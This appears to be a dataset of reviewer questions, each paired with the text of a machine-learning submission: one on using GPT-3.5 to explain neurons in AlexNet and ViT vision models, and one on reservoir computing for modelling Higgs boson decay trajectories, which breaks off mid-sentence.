(TextGraphs-12)*, pp. 59–69, 2018. Octavian Ganea, Gary Bécigneul, and Thomas Hofmann. Hyperbolic neural networks. *Advances in neural information processing systems*, 31, 2018. Dibya Ghosh and Marc G Bellemare. Representations for stable off-policy reinforcement learning. In *International Conference on Machine Learning*, pp. 3556–3565. PMLR, 2020. Ghost Town Games. Overcooked, 2016. [https://store.steampowered.com/app/448510/Overcooked/](https://store.steampowered.com/app/448510/Overcooked/). Aditya Grover, Maruan Al-Shedivat, Jayesh Gupta, Yuri Burda, and Harrison Edwards. Learning policy representations in multiagent systems. In *International conference on machine learning*, pp. 1802–1811. PMLR, 2018. He He, Jordan Boyd-Graber, Kevin Kwok, and Hal Daumé III. Opponent modeling in deep reinforcement learning. In *International conference on machine learning*, pp. 1804–1813. PMLR, 2016.
01ep65umEr
How does the GPT explanation help to understand the neural network’s internal decision problem? Deep learning models are known to be distributed representation, meaning that one neuron won’t determine the final decision. How could the proposed method be used to explain the cooperative behavior of the neurons in order to help people understand how the vision model arrives at its decision?
TELLME WHAT YOU SEE: USING LLMs TO EXPLAIN NEURONS IN VISION MODELS Anonymous authors Paper under double-blind review ABSTRACT As the role of machine learning models continues to expand across diverse fields, the demand for model interpretability grows. This is particularly crucial for deep learning models, which are often referred to as black boxes, due to their highly nonlinear nature. This paper proposes a novel method for generating and evaluating concise explanations for the behavior of specific neurons in trained vision models. Doing so signifies an important step towards better understanding the decision making in neural networks. Our technique draws inspiration from a recently published framework that utilized GPT-4 for interpretability of language models. Here, we extend and expand the method to vision models, offering interpretations based on both neuron activations and weights in the network. We illustrate our approach using an AlexNet model and ViT trained on ImageNet, generating clear, human-readable explanations. Our method outperforms the current state-of-the-art in both quantitative and qualitative assessments, while also demonstrating superior capacity in capturing polysemic neuron behavior. The findings hold promise for enhancing transparency, trust and understanding in the deployment of deep learning vision models across various domains. The relevant code can be found in our GitHub repository. 1 INTRODUCTION With the increasing prevalence of complex machine learning models in various domains of life, there has been a rising demand for interpretability. Understanding why these models make the decisions they do is crucial, not just from a research perspective, but also for ethical and societal reasons. Deep learning models, especially, are often seen as black boxes due to their complex and highly nonlinear nature. This challenge is particularly evident in the context of vision models, where the relationship between inputs (image pixels) and outputs (class labels) is often not straightforward. In this paper, we address this challenge by developing a method for generating and evaluating short explanations for the behavior of individual neurons in trained vision models. To the best of our knowledge, this is the first time a Large Language Model (LLM) has been used this way. Additionally, by leveraging the power of LLMs, our method does not require training a specialized model, and instead offers a method to assessing the quality of the explanations at scale. Interpreting the computations performed by deep networks has been split up into three major sub-areas: visualization, probing and explaining single neurons. Visualization The most common visualization technique for interpretability, is finding the input image that maximally activates a specific neuron (Erhan et al., 2009; Yosinski et al., 2015; Olah et al., 2017). However, beyond that, visualization has been used to offer additional insights into feature importance (Sundararajan et al., 2017; Zhou et al., 2015), and better understanding the self-attention mechanism of transformers (Vig, 2019; Brașoveanu & Andonie, 2020). Probing Another popular technique is using a secondary (often much smaller) classifier to estimate the type of information encoded in the hidden state of the main model. To that end, the secondary model is trained to predict a class (i.e. Part-of-Speech, Named Entities, Semantic Roles, Polarity, etc.), given the hidden states of a network layer from the main model. The efficacy of the prediction indicates what information is encoded. This technique was first introduced by Alain & Figure 1: Left: The 25 highest activating images for an example neuron (neuron 489 of the second-last hidden layer) from an AlexNet model trained on ImageNet. Right: The generated explanation for this neuron, from the current SoTA method (Clip-Dissect) and the three methods proposed in this paper (GPT (Weight-Label), GPT (Weight-CLIP), GPT (Caption-Activation)) Bengio (2017) and has since been used to identify the role of specific neurons (Bau et al., 2020; Suau et al., 2020) and the level of complexity at different layers in transformer networks (Tenney et al., 2019; Voita et al., 2019; Raganato & Tiedemann, 2018; Nostalgebraist). Explaining Single Neurons Most relevant to this work is the line of research that aims to find short explanations for individual neurons. Techniques employed to do so include manual inspection (Miller & Neo), creating a custom dataset and training a specialized classifier (Bau et al., 2017), and comparing the embedding similarities of images activating a specific neuron and text embeddings using a trained Vision-Language Model (Oikarinen & Weng, 2023). Additionally, Hernandez et al. (2022) trained a RNN to generate natural language descriptions of neurons in vision models, and Bills et al. (2023) used GPT-4 to generate short explanations of neurons in GPT-2 based on the words the neuron activated for. Notably, Bills et al. (2023) has also provided a way to quantitatively assess the quality of explanations. Namely, they use a secondary GPT-4 model to simulate the activations of a neuron given the explanation, and judge the quality of the explanations based on the correlation scores (here, and in the remainder of the paper we denote $100 \times$ correlation coefficient as the correlation score) it achieved relative to the actual activations. Our method is rooted in the framework introduced by Bills et al. (2023). However, we explain individual neurons in vision models, rather than language models, and do so via both the activations and the weights of the network. The key contributions of the paper are: 1. We generate short, easy-to-understand explanations of neuron selectivity in a trained vision model with two different techniques; firstly, using the weights of the model and secondly, using the image-caption / neuron activation pairs. 2. We are the first to propose a reliable & scalable explanation scoring algorithm for neurons in vision models. 3. We show that the proposed method works for other Vision models, including a ViT. 4. We show that our proposed methods are better in capturing polysemanticity, easier to understand, and quantitatively perform better than the current state-of-the-art. The remainder of the paper is structured as follows: in Section 2 we highlight relevant related work and in Section 3 we present in detail our methods. We benchmark our methods against the current state-of-the-art in Section 4 and finally conclude in Section 5. 2 RELATED WORK Out of the three main interpretability techniques described in Section 1 “Explaining Single Neurons” is most relevant to our work. As mentioned, interpretability can generally be sub-divided based on the techniques used to elucidate neuron explanations. Manually inspecting neurons and collecting specific datasets both introduce a large enough overhead for them to not be practical solutions for practitioners. Thus, we will be focusing on similarity based explanations and open-ended explanations. 2.1 SIMILARITY-BASED EXPLANATIONS The recently published work by Oikarinen & Weng (2023) uses a trained Vision Language Model (VLM) to generate similarity based explanations in three steps. 1. First, the VLM is used to separately embed a set of probing images (which can be unlabeled) and a set of concept words. Subsequently, the concept-activation matrix is calculated by taking the inner product of each of the text and image embeddings. 2. Second, given a specific neuron that we want to explain, the activation of this neuron for each image in the probing set is recorded. 3. Lastly, the similarity between the activation vector from the second step and each column of the matrix in the first step is determined. The concept for the column with the highest similarity is used to describe the neuron. This method has a good cost-quality trade-off. Whilst it is very cheap and fast to run, it has two shortcomings. Firstly, the one-term explanations it generates (i.e. “terrier”, “feather”, “nursery”) are not very nuanced and thus might miss subtleties of the neuron encoding. Secondly, there is a body of research documenting the prevalence of polysemantic neurons in deep learning models (Elhage et al., 2022; Olah et al., 2020). Naturally, it is hard to describe a neuron that looks for a multitude of potentially very different objects, with a single term. 2.2 OPEN ENDED EXPLANATIONS The most important work in this area is the recently published paper “Language models can explain neurons in language models” by Bills et al. (2023). In their work, the authors used GPT-4 to generate human understandable explanations for individual neurons in GPT-2 (a large language model) based on how strongly they activate for various input words. Beyond simply generating explanations, they used a separate GPT-4 model to simulate the neuron activity for a test sentence based on the generated explanation; assessing the quality thereof by calculating the correlation between the real and the simulated activations. Though this is not the first work that is able to generate human understandable explanations for individual neurons, see Hernandez et al. (2022), to the best of our knowledge, it is the only work that does not require training a specialized model, generates high quality text, and most importantly, offers a method of assessing the quality of the explanations at scale. 3 METHOD Our paper proposes two separate methods for explaining singular neurons in a trained vision model. First, we will describe the activations based method, and subsequently the weight based method. Both methods consist of an explanation generation component and an explanation assessment component. Unless specified otherwise, we will use an AlexNet classifier trained on ImageNet and gpt-3.5-turbo-0613 for all experiments. However, it is worth pointing out that given the results from Olah et al. (2020); Chughtai et al. (2023), and our experiments on Vision Transformers, our method is very likely to generalize to other vision models. 3.1 Activation-based Explanations Out of the two proposed methods, generating explanations based on neuron activations, is most similar to the work proposed by Bills et al. (2023). Since GPT-2 is a text based method, it is relatively easy to extract token-activation pairs of a specific neuron, and based on that to find and test explanations. However, since the GPT family of models does not yet support multi-modal inputs, and open source Vision-Language Models (VLMs) are not as capable as the GPT models, we need to use another model as the intermediary. To be more specific, we find captions for all images in the ImageNet (Russakovsky et al., 2014) validation set using BLIP (Li et al., 2022), and track the activation intensity specific neurons have for each image. Based on these Caption-Activation pairs we can generate and assess explanations. A diagram explaining the method can be seen in Figure 2 (the corresponding pseudocode for Figure 2 can be found in Appendix A.1). ![Diagram](image) **Figure 2:** Overview of the proposed Caption-Activation method. An LLM is used to generate a human-readable explanation of an individual neuron’s behavior, given a set of captions and activations. Then, an independent second LLM is used to generate the neuron’s simulated (predicted) activations, given the generated explanation and a set of captions. The correlation between the simulated and actual activations are then calculated. Snowflake symbols indicate that models are frozen. 3.1.1 Generating Explanations To generate open-ended natural language explanations for the activities of a specific neuron, we utilize the well-documented ability of GPT to be an effective few-shot predictor. By showing it a number of few-shot examples, which entail a number Caption-Activation pairs for a neuron that isn’t the neuron to be labeled, and then task GPT, based on the Caption-Activation pairs of the neuron that is to be labeled, to generate a short explanation. Details for determining the optimal number of few-shot examples and the size of the subset of Caption-Activation pairs shown to the model can be found in Appendix B.1.2. Following Bills et al. (2023), we simplify the task at hand for GPT by expressing the activations as integers in the range \([0, 10]\). The full prompt used can be found in Appendix D.1. 3.1.2 Assessing Explanations Accurately determining how fitting these explanations are is more important than generating explanations for specific neurons. To do so, we prompt a GPT-3.5 model using image captions and its corresponding explanation to determine how strongly the neuron will activate for each caption. To simplify the task for GPT, we provide some few-shot examples, scale all activations in the range \([0, 10]\) and round them to be integers, similar to Bills et al. (2023). It is worth pointing out that we are using gpt-3.5-turbo-0613 and thus are limited to a 4K context window. This means that at any one time, we are only able to show GPT a subset of the available Caption-Activation pairs. We conduct some hyperparameter tuning in Appendix B.1.1 to determine the optimal number of few-shot examples and the size of the Caption-Activation subset. The full prompt for assessing neuron explanations can be found in Appendix D.2. Finally, using the simulated activations, we determine the correlation to the true activations and use this as a measurement of success for the explanation. Since we will be introducing correlation scores with other targets than the neuron activations later on in this paper, from now on, we will refer to this one as Correlation Score (Caption-Activation). One big challenge with using a subset of the images and few-shot examples is the variance in the correlation scores achieved by different runs. To fight this, we iteratively re-assess the same explanations until the 90% Confidence Interval (CI) of the average is < ±5 (see Algorithm 1). **Algorithm 1 Explanation Scoring** Require: Neuron explanation. Scores = [] while len(Scores) < 3 or CI(Scores) ≤ 5 do Scores append Score(Simulate(Neuron explanation)) end while where \( CI(x) = T_{0.95,\text{sample\_size}-1} \cdot \frac{\text{sample\_std}}{\sqrt{\text{sample\_size}}} \) (T being the t-score corresponding to the critical value for a two-tailed test). Score(x) determines the correlation of the simulated activations and the actual activations, and Simulate(x), simulates the neuron activations based on the neuron explanation using GPT. The main purpose of the algorithm is to save cost, since the alternative would be to run it for a constant (high) number of iterations and then take the average. Using the algorithm, we can stop as soon as it is sensible to do so (i.e. once the 90% CI of the average is < ±5. ### 3.2 Weight-based Explanations Besides proposing an activation based explanation for neurons, we introduce a separate technique that utilizes the weights of the trained network. As will become evident, the last hidden layer, and all other layers have to be treated differently, thus we will first explain how the assessment and generation work for the last hidden layer, and subsequently, generalize this to the whole network. Since we do not have access to the input-activation pairs when only using the weights to generate and assess explanations, we will extract the Weight-Label pairs (where the Labels are the ImageNet classes). This has the advantage of not relying on an image captioning model and not requiring us to pass a number of images through the network. However, just because a specific neuron is connected to a specific output label with a high weight, does not necessarily mean that the object related to the output class does indeed trigger high activations of the neuron. Furthermore, as we go deeper into the net (counting from the output layer), the features present will likely become increasingly abstract. Thus, it is not clear that the model, solely based on the class names and weights, is able to generate meaningful explanations for specific neurons. Figure 3 shows a diagram of the method (the corresponding pseudocode for Figure 3 can be found in Appendix A.2). #### 3.2.1 Generating Explanations The key difference to the technique used in Section 3.1.1 is that we use Weight-Label pairs, rather than Caption-Activations pairs. Other than that, we follow the same preprocessing as in Section 3.2.2 and the hyperparameters determined in Appendix B.2.2. The final prompt used can be found in Appendix D.4. #### 3.2.2 Assessing Explanations Since the explanations are generated based on weights, we will assess them based on how well a secondary GPT model can predict the weights associated with each output class given a neuron Figure 3: Overview of the proposed Weight-Label method. An LLM is used to generate a human-readable explanation of an individual neuron’s behavior, given a set of labels and the magnitude of the weights that connect the neuron to be explained to that label. Then, a second, independent, LLM is used to simulate the neurons weights for another set of labels. The correlation between the simulated and actual weights are then calculated. Snowflake symbols indicate that models are frozen. To simplify this task, we will set all negative weights to zero for now, scale the positive ones in the range $[0, 10]$, and convert them to integers. Besides the above mentioned differences, we still utilize some few-shot examples, which each have a subset of the 1000 Weight-Label pairs (the subsetting is required, since we are using a 4K context window). The fine-tuning for these hyperparameters can be found in Appendix B.2.1 and the final prompt used can be found in Appendix D.5. Following our set-up in Section 3.1.2 we quantify the explanation quality using the correlation score between the actual and predicted weights. Again, to make the results reliable, the same explanation is re-assessed, until the 90% CI is < ±5 (using Algorithm 1). ### 3.2.3 Generalizing to Other Layers As already mentioned, the last hidden layer is somewhat of a special case, as it is directly connected to the output layer, and with that, the class labels. Thus it is very easy to extract the Weight-Label pairs. However, since this can’t be done for the remaining layers of the network, we propose three different techniques. Namely: **Naively combining weights** The easiest method to implement is to estimate the weight connecting the, for example, second last hidden layer (or any other layer) to the output layer by taking the dot-product of the weight matrices. $$W_{est} = W_t \cdot W_{t-1}...W_{target}$$ where $W_{est}$ is the estimated weight matrix, $W_t$ is the weight matrix connecting the $t - 1$ hidden layer to the $t$ (final) hidden layer. Though this estimation is not perfect, as it disregards the activation function, and will make it harder for the model to determine the level of abstraction of the current neuron, it is a fast and cheap estimate that will serve well as a baseline. For the remainder of the paper we will refer to this method as Weight-Label. **Using CLIP-Dissect labels as targets** Alternatively, it is possible to use simpler (and more importantly cheaper) methods to label all neurons of a specific layer with a simplistic explanations, and then use these explanation as target-weight pairs. In our experiments, we will be using CLIP-Dissect (Oikarinen & Weng, 2023), for this. This method will make it easier for GPT to determine the level of abstraction required for the explanation, but might introduce inaccuracies for both explanation generation and assessment, as it relies on a secondary model. Furthermore, as we will show later, these simplistic methods do not capture polysemanticity well. For the remainder of the paper, we will refer to this method as Weight-CLIP. Using GPT-explanations as targets Lastly, it is possible to label a whole layer using our method, before moving on to the next layer. The next layer can simply use the Weight-Explanation pairs to generate the next explanations. Though this method seems most promising, it has the obvious short-coming of being by far most expensive. To label the full last hidden layer in AlexNet would cost: # of Neurons * # API calls per Neuron * avg. prompt length * API cost per 1K tokens = 4096 * 25 * 2.5 * 0.0015 = 389(USD). Due to the high cost, we did not test this method in this work but offer the method as a proposal. 4 EXPERIMENTS To test the quality of the proposed methods, we will first generate explanations for neurons in an AlexNet model trained on ImageNet, via a plethora of different methods. These explanations will be assessed both quantitatively (based on the weight correlation and activation correlation) and qualitatively (by visualizing the subset of images in the ImageNet validation set that trigger the highest activation in the neuron we are explaining). Subsequently, we will show the quantitative results of our method when explaining neurons in a Vision Transformer. It is important to highlight that we report all results generated without cherry-picking. Below we benchmark our techniques on Neuron 489 of the second last hidden layer. This neuron was randomly selected, and examples of other neurons can be found in Appendix C. Since the GPT-based methods required some few-shot examples, we hand-label 3 other neurons from the layer in question. The techniques we will be benchmarking are: • CLIP-Dissect: As our baseline, we use the CLIP-Dissect method proposed by Oikarinen & Weng (2023), using their official code base.\footnote{https://github.com/Trustworthy-ML-Lab/CLIP-dissect} • GPT (Caption-Activation): Lastly, we use the BLIP generated image Captions and neuron activation magnitude pairs as features, as described in Section 3.1. The Correlation Score (Caption-Activation) simulates the activations of a neuron given the explanation. • GPT (Weight-Label): As described in Section 3.2.3, this version of our method uses the Weight-output class pairs as features for generating the explanations and, the Correlation Score (Weight-Label), uses them for the simulation and subsequent assessment. For layers beyond the first hidden layer, the weight matrix from the current layer to the output layer is estimated via equation 1. • GPT (Weight-CLIP): As described in Section 3.2.3, this version of our method uses the Weight CLIP-Dissect pairs as features. To that end, we used the CLIP-Dissect method to label all neurons in the network, and then simply extracted the weight CLIP-Dissect pairs, similarly to how the Weight-Label pairs are extracted from the last hidden layer. The Correlation Score (Weight-CLIP) aims to predict the Weight-CLIP pairs given a short neuron explanation. Additional experiments using other LLMs than GPT-3.5 can be found in Appendix C.2. 4.1 QUANTITATIVE ANALYSIS Table 1 shows the average Correlation Scores achieved by the various methods. Each method was used to generate 10 different explanations, and the highest scoring one is reported. The reason for doing so is that when actually using the methods to label a network, one has access to this information and presumably tries to find the best fitting explanation (rather than the average). As | Method | Correlation Score | |------------------------|-------------------| | | Caption-Activation | Weight-Label | Weight-CLIP | | CLIP-Dissect | 0.0% | 3.28% | 1.43% | | GPT (Caption-Activation)| 15.43% | 31.20% | 6.51% | | GPT (Weight-Label) | 16.11% | 51.58% | 8.27% | | GPT (Weight-CLIP) | 5.47% | 9.38% | 22.05% | Table 1: The correlation scores achieved by various methods as assessed with three different targets each. expected, the methods that use a specific feature pair tend to do best when assessed on that feature pair i.e. GPT (Weight-CLIP) does better than the other methods on the Correlation Score (Weight-CLIP). Overall, however, GPT (Weight-Label) clearly does best, with the best performance in two out of three metrics, and a decent performance on the last one. This is a somewhat surprising result as the Weight-Label pairs offer by no means definitive insight into which aspect of the image the neuron is activating for (i.e. a neuron might very well be activating for images containing planes, but only because these images tend to have the sky as the background). However, given the results from the table, it is clear that these implicit descriptions are good enough to generate a strong explanation. It is worth pointing out that for the Correlation Score (Weight-Label) and (Weight-CLIP), we are only considering the positive weights (as mentioned in Section 3.2.2). All other weights have been zero-ed. The case with negative weights is analyzed in Appendix C.3.1. 4.2 Additional Qualitative Results In addition to the qualitative results shown in Figure 11, we show 20 of the highest activating images for the three remaining neurons we explained in AlexNet, side-by-side, with the generated explanations as well as the Correlation Score (Weight-Label) (See Figure 4). 4.3 Explaining a ViT Following Oikarinen & Weng (2023), we conducted additional experiments of our method on the last hidden layer of a ViT-B-16 (trained on ImageNet). We used the Weight-Label approach since it worked best for our main experiments. To provide some additional insights, we also report the Accuracy (Acc), Mean Squared Error (MSE) and Mean Absolute Error (MAE), in addition to the achieved correlation scores (Corr) (all of which are calculated for the simulated weights vs the true weights). The neurons were selected randomly, and we report all results without any cherry picking. | Neuron | Scores | |--------|--------| | | Corr. | Acc. | MSE | MAE | | 50 | 18.66% | 8% | 13.34 | 3.22 | | 75 | 19.10% | 30% | 12.98 | 2.66 | | 122 | 50.47% | 28% | 5.96 | 1.84 | | 150 | 23.11% | 34% | 11.18 | 2.34 | | 457 | 26.78% | 24% | 7.20 | 2.12 | | 489 | 22.08% | 44% | 6.62 | 1.70 | | 746 | 30.89% | 38% | 5.04 | 1.52 | | Avg. | 27.30% | 29.43%| 8.90 | 2.2 | Table 2: The performance of our method on a number of randomly-selected neurons from the last hidden layer of a Vision Transformer. As can be seen in Table 2, the proposed method does a good job explaining a number of neurons from the last hidden layer of a vision transformer. This is a good indication that the method will generalize to other models and architectures. 5 Conclusion Our experiments show that our proposed method of explaining the behavior of specific neurons in vision models performs well both quantitatively and qualitatively. This is demonstrated by the higher correlation scores in comparison to current state-of-the-art methods and the qualitative analysis of the explanations. To the best of our knowledge, this is the first time that a Large Language Model has been used to create human readable explanations of specific neurons in a vision model. While we focused on AlexNet and ViT in this work, this methodology could be extended to other vision models. A larger language model could potentially provide more nuanced and accurate explanations, as indicated by the experiments in Bills et al. (2023). However, the proposed methods are not without limitations. The biggest drawbacks are that some explanations are vague, using the GPT-3.5 API is costly (especially when labeling a complete network) and contrary to CLIP-Dissect, the method requires some hand-labeled examples (though, as we have shown in our experiments, only 2 per layer). In conclusion, we have presented a method for explaining the behavior of specific neurons in vision models using GPT-3.5. Our method is intuitive, scalable, and can be extended to various vision models. While we acknowledge its limitations, we believe it represents a significant step forward in the area of machine learning interpretability, particularly in understanding complex deep learning models. By making these models more interpretable, we can foster greater trust and transparency, which is crucial as these models become increasingly prevalent in various domains of life. References Guillaume Alain and Yoshua Bengio. Understanding intermediate layers using linear classifier probes, 2017. URL https://openreview.net/forum?id=ryF7rTqgI. David Bau, Bolei Zhou, Aditya Khosla, Aude Oliva, and Antonio Torralba. Network dissection: Quantifying interpretability of deep visual representations. CoRR, abs/1704.05796, 2017. URL http://arxiv.org/abs/1704.05796 David Bau, Jun-Yan Zhu, Hendrik Strobelt, Agata Lapedriza, Bolei Zhou, and Antonio Torralba. Understanding the role of individual units in a deep neural network. *Proceedings of the National Academy of Sciences*, 117(48):30071–30078, sep 2020. doi: 10.1073/pnas.1907375117. URL https://doi.org/10.1073%2Fpnas.1907375117. Steven Bills, Nick Cammarata, Dan Mossing, Henk Tillman, Leo Gao, Gabriel Goh, Ilya Sutskever, Jan Leike, Jeff Wu, and William Saunders. Language models can explain neurons in language models. https://openaipublic.blob.core.windows.net/neuron-explainer/paper/index.html 2023. Adrian M. P. Brașoveanu and Răzvan Andonie. Visualizing transformers for NLP: A brief survey. In *2020 24th International Conference Information Visualisation (IV)*, pp. 270–279, 2020. doi: 10.1109/IV51561.2020.00051. Bilal Chughtai, Lawrence Chan, and Neel Nanda. A toy model of universality: Reverse engineering how networks learn group operations, 2023. Nelson Elhage, Tristan Hume, Catherine Olsson, Nicholas Schiefer, Tom Henighan, Shauna Kravec, Zac Hatfield-Dodds, Robert Lasenby, Dawn Drain, Carol Chen, Roger Grosse, Sam McCandlish, Jared Kaplan, Dario Amodei, Martin Wattenberg, and Christopher Olah. Toy models of superposition, 2022. Dumitru Erhan, Yoshua Bengio, Aaron Courville, and Pascal Vincent. Visualizing higher-layer features of a deep network. *University of Montreal*, 1341(3):1, 2009. Evan Hernandez, Sarah Schwettmann, David Bau, Teona Bagashvili, Antonio Torralba, and Jacob Andreas. Natural language descriptions of deep visual features. In *International Conference on Learning Representations*, 2022. URL https://arxiv.org/abs/2201.11114. Junnan Li, Dongxu Li, Caiming Xiong, and Steven Hoi. BLIP: Bootstrapping language-image pre-training for unified vision-language understanding and generation, 2022. Joseph Miller and Clement Neo. We found an neuron in GPT-2. URL https://www.lesswrong.com/posts/cgqh99SHsCv3jJYDS/we-found-an-neuron-in-gpt-2 Nostalggebraist. Interpreting GPT: The logit lens. URL https://www.lesswrong.com/posts/AcKRB8wDpdaN6v6ru/interpreting-gpt-the-logit-lens Tuomas Oikarinen and Tsui-Wei Weng. CLIP-dissect: Automatic description of neuron representations in deep vision networks. In *The Eleventh International Conference on Learning Representations*, 2023. URL https://openreview.net/forum?id=iPWiwWHc1V Chris Olah, Alexander Mordvintsev, and Ludwig Schubert. Feature visualization. *Distill*, 2017. doi: 10.23915/distill.00007. https://distill.pub/2017/feature-visualization. Chris Olah, Nick Cammarata, Ludwig Schubert, Gabriel Goh, Michael Petrov, and Shan Carter. Zoom in: An introduction to circuits. *Distill*, 2020. doi: 10.23915/distill.00024.001. https://distill.pub/2020/circuits/zoom-in. Alessandro Raganato and Jörg Tiedemann. An analysis of encoder representations in transformer-based machine translation. In *Proceedings of the 2018 EMNLP Workshop BlackboxNLP: Analyzing and Interpreting Neural Networks for NLP*, pp. 287–297, Brussels, Belgium, November 2018. Association for Computational Linguistics. doi: 10.18653/v1/W18-5431. URL https://aclanthology.org/W18-5431 Olga Russakovsky, Jia Deng, Hao Su, Jonathan Krause, Sanjeev Satheesh, Sean Ma, Zhiheng Huang, Andrej Karpathy, Aditya Khosla, Michael Bernstein, Alexander C. Berg, and Li Fei-Fei. Imagenet large scale visual recognition challenge. 2014. URL http://arxiv.org/abs/1409.0575 cite arxiv:1409.0575Comment: 43 pages, 16 figures. v3 includes additional comparisons with PASCAL VOC (per-category comparisons in Table 3, distribution of localization difficulty in Fig 16), a list of queries used for obtaining object detection images (Appendix C), and some additional references.
RRKggDJxo2
* What's the motivation for reservior-in-reservior? Is it similar to boosting methods, or ensembling methods in classical machine learning? Or perhaps similar to multi-head attention where each heads focus on some part of the problem, and then they are aggregated.
Real-time learning of the decay trajectory in Higgs bosons as they interact in the Higgs Field is the key to understanding and furthering of the mass providing mechanism and particle interaction mechanism beyond the Standard model in particle physics. We propose a novel machine learning architecture called reservoir-in-reservoir (R-i-R), to learn this complex high dimensional weak and electromagnetic interaction model involving a large number of arbitrary parameters whose full understanding remains elusive to physicists, making it harder to handcraft features or represent in a closed-form equation. Reservoir-in-reservoir is a reservoir computing (RC) approach, where we build a large reservoir using a pool of small reservoirs that are individually specialized to learn patterns from discrete time samples of decay trajectory without any prior knowledge. Each small reservoir consists of a paired primary and secondary reservoir of recurrently-connected neurons, known as learner and generator, respectively, with a readout connected to the head. During the training phase, we activate the learner-generator pairs within the pool. Then we excite each learners with an unit impulse and individual time windows of the incoming system. We train the internal recurrent connections and readouts using a recursive least squares-based First-Order and Reduced Control Error (FORCE) algorithm. To enhance adaptability and performance, we implement a time-varying forgetting factor optimization during training. This optimization helps control the fading and adaptation of the covariance matrix based on variations in the incoming decay trajectory and patterns. This comprehensive training strategy aims to guarantee that the entire reservoir pool evolves in harmony with the desired output dynamics. We optimize hyper-parameters such as the number of learner-generator pairs within the pool, their network sizes, batch sizes, and the number of training trials. During testing, we excite the generators in the pool, with only an unit impulse, to mimic the dynamic system. We facilitate real-time learning by re-triggering the training process involving learner-generator pairs whenever the error rate exceeds a predefined threshold. We evaluate our reservoir-in-reservoir architecture using Higgs boson decay trajectories as detected in the Compact Muon Solenoid (CMS) detector of CERN’s Large Hadron Collider (LHC). The reservoir pool is used to model the dynamics of momentum components (and transverse momentum) as Higgs boson decays into photons and leptons (electrons and muons) with invariant masses between 120-130 GeV. Our results indicate that reservoir-in-reservoir architecture is a well suited machine learning paradigm in learning dynamical systems real time, with network size below state-of-the-art architectures and greater adaptability to aperiodic behavior. 1 Introduction The study and emulation of systems dynamically evolving over space and time have been long-standing concerns in physics, engineering, and applied mathematics. Efficient control and replication of such nonlinear systems solely from observational data are essential endeavors. Machine learning (ML) systems have emerged to decipher intricate and adaptable structures. However, existing techniques for system identification typically rely on predefined model dynamics, frequently leading to linear approximations that restrict their applicability to minor perturbations around equilibrium points within the dynamics limiting their effectiveness to small amplitude transient perturbations around a fixed point of the dynamics [Nelles & Nelles (2020); Billings (2013)]. The discovery of the Higgs boson in 2012 [Aad et al. (2012)], crucial in particle physics, is one such space-time varying dynamic phenomenon, generated and studied through collisions rather than being found in isolation. Its subsequent decay into detectable particles are studied in detectors to understand the Higgs boson’s interactions, seeking its role in the universe’s formation, its mass generation mechanism, and its potential connections to dark matter and new particles [Collaboration et al. (2012); Carpenter et al. (2014)]. But even the primary discovery of the particle required two and a half times more data than usual, to ensure Higgs boson had been discovered [[email protected] (2022)]. Reservoir Computing was proposed by Maass et al. (2002) as a human brain inspired computational paradigm to its preceding Turing Machines, with less resource constraints and easier training capabilities. They represent a pivotal advance in ML, addressing the complexities encountered in training traditional feed-forward networks. In contrast to layered architectures that necessitate intricate weight adjustments of every neuron across multiple layers, RC introduces a special form of Recurrent Neural Networks (RNN) with feedback mechanisms. While RNNs offer enhanced computational capabilities, their full training remains challenging due to back-propagation through time requiring entire sequence recalling, making it biologically inefficient as shown in Schmidt et al. (2019); Lillicrap & Santoro (2019); Hinton (2022). RC streamlines RNN training by introducing a fixed reservoir that requires no adjustment. This reservoir acts as parallel spatiotemporal filters applied to input signals, projecting nonlinear features into a high-dimensional space. The subsequent task of separating these features becomes a simplified linear process. Despite its apparent simplicity, RC-trained RNNs have demonstrated remarkable robustness across diverse applications, including data classification, systems control, time-series prediction, and the elucidation of linguistic and speech features. RC architectures are task-independent, utilizing property of high-dimensional dynamical systems (DS), statistical learning theory, and generic recurrent circuitry [Maass et al. (2002); Seoane (2019); Lukoševičius & Jaeger (2009); Gauthier et al. (2021); Lukoševičius (2012)]. RC architectures [Tanaka et al. (2019); Zhong et al. (2021); Moon et al. (2019); Abreu Araujo et al. (2020)] have been explored to learn dynamically evolving systems, like temporal signals, electrical waves and more, for their adaptability to learn using less data and faster convergence. a) Echo state networks (ESN), exhibit the distinctive echo state property [Jaeger (2002); Lukoševičius (2012)], where solely the output weights undergo training, enabling rapid acquisition of temporal patterns. b) FORCE Architecture: The First Order Reduced Controlled Error based reservoirs are well-suited for temporal tasks capitalizing on the intrinsic spiking dynamics of neurons to acquire proficiency in processing sequential data [Sussillo & Abbott (2009); Yada et al. (2021)]. c) Full-FORCE architecture extends the FORCE dynamics by amalgamating the spiking neuron dynamics with feedback connections, enhancing its aptitude for learning and controlling dynamical systems [DePasquale et al. (2018)]. However, they face challenges of prior assumptions about the DS, large reservoir sizes, and slow convergence. They are stochastic, lack adaptability for aperiodic systems, and are primarily supervised. In response to these challenges, we present a real-time learning paradigm for system identification that eschews reliance on predefined equations. Our architecture, called ‘reservoir-in-reservoir’ is a reservoir pool consisting of small learner a dynamically adjusts to evolving system dynamics, systematically reducing cost function through real-time learning. This framework optimizes system attributes by considering input a-periodicity, concurrently keeping network sizes minimal to expedite convergence and enhance energy efficiency. Empirical validation underscores the competitiveness of our approach in learning aperiodic nonlinear systems. Our method demonstrates superior convergence capabilities with much reduced network dimensions. 1.1 THE HIGGS BOSON DECAY The unification of two of the four fundamental forces which are the weak force and the electromagnetic force forms the basis of the Standard Model of particle physics [Cowan (2012)]. It implies that electricity, magnetism, light and some types of radioactivity can be potential manifestations of a single underlying force known as the electroweak force. This unification of forces theory describes the electroweak force and its relationship with force-carrying particles, the photon, and the W and Z bosons [McMahon (2008)]. Although photons emerge without a mass, W and Z have 100 times the mass of a proton. The Brout-Englert-Higgs mechanism gives a mass to the W and Z when they interact with an invisible field, called the “Higgs field”, first proposed by Peter Higgs and later discovered in [Aad et al. (2012)]. Following the Big Bang, as the universe cooled and its temperature... Figure 1: Left: An event display for the CMS experiment showing collision of particles occurring inside the detector. Right: the momentum trajectory of a single lepton in x,y,z plane visualized in 3 dimensions. The yellow, blue and green suggests the momentum variation on their respective planes of xy, yz and xz respectively. dropped below a critical threshold, the Higgs field [Bezrukov (2013)] underwent continuous expansion, endowing particles with mass through their interactions. This process is mediated by the Higgs boson, which serves as the visible manifestation of the Higgs field and acts as the force carrier responsible for imparting mass to other fundamental particles. Extensive research that underwent by the ATLAS and CMS Collaborations at the Large Hadron Collider (LHC) [Brüning et al. (2012)] has been in characterising the properties of the Higgs boson, and unfolding all of the diverse ways in which this particle can decay. Being highly unstable, the particle decays into other subparticles and understanding this 